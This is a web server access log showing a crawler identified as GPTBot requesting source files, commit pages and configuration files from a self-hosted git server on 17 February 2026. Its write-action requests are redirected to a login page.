"https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:16:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 5308] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:16:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11427] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" -[17/Feb/2026:16:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/update_status.py" [Client 74.7.227.38] [Length 9788] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/update_status.py" -[17/Feb/2026:16:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 895] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/labels?sort=leastissues&state=" [Client 74.7.227.38] [Length 7638] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/labels" -[17/Feb/2026:16:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 12087] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/tsconfig.json" -[17/Feb/2026:16:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" -[17/Feb/2026:16:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2fmain.cpp" [Client 74.7.227.38] [Length 30030] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/main.cpp" -[17/Feb/2026:16:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2f.vscode" [Client 74.7.227.38] [Length 26837] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode" -[17/Feb/2026:16:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11771] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md" -[17/Feb/2026:16:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11770] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md" -[17/Feb/2026:16:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 11754] [Gzip 4.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:16:30:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/docker-compose.yml" -[17/Feb/2026:16:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/docker-compose.yml" -[17/Feb/2026:16:30:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/docker-compose.yml" -[17/Feb/2026:16:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/docker-compose.yml" -[17/Feb/2026:16:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=name&state=open" [Client 74.7.227.38] [Length 8469] [Gzip 2.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones" -[17/Feb/2026:16:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/projects?q=&sort=oldest&state=open" [Client 74.7.227.38] [Length 7791] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/projects" -[17/Feb/2026:16:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 10637] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" -[17/Feb/2026:16:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 29830] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:16:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:30:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:16:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:16:30:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:16:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:16:30:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" -[17/Feb/2026:16:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/metadata.json" -[17/Feb/2026:16:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=name&state=all" [Client 74.7.227.38] [Length 8463] [Gzip 2.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=name&state=open" -[17/Feb/2026:16:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/script.js" -[17/Feb/2026:16:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 10303] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp" -[17/Feb/2026:16:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service?display=rendered" [Client 74.7.227.38] [Length 11127] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog.service" -[17/Feb/2026:16:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/projects.sln?display=source" [Client 74.7.227.38] [Length 11931] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/projects.sln" -[17/Feb/2026:16:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fProperties%2flaunchSettings.json" [Client 74.7.227.38] [Length 21724] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:16:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 11079] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/types.ts" -[17/Feb/2026:16:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12994] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" -[17/Feb/2026:16:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 14072] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" -[17/Feb/2026:16:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12986] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" -[17/Feb/2026:16:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 13210] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" -[17/Feb/2026:16:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?q=&sort=name&state=closed" [Client 74.7.227.38] [Length 8494] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?sort=mostcomplete&state=closed" -[17/Feb/2026:16:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 9986] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" [Client 74.7.227.38] [Length 11086] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" -[17/Feb/2026:16:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 31527] [Gzip 6.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 1140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:16:30:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:16:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:16:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 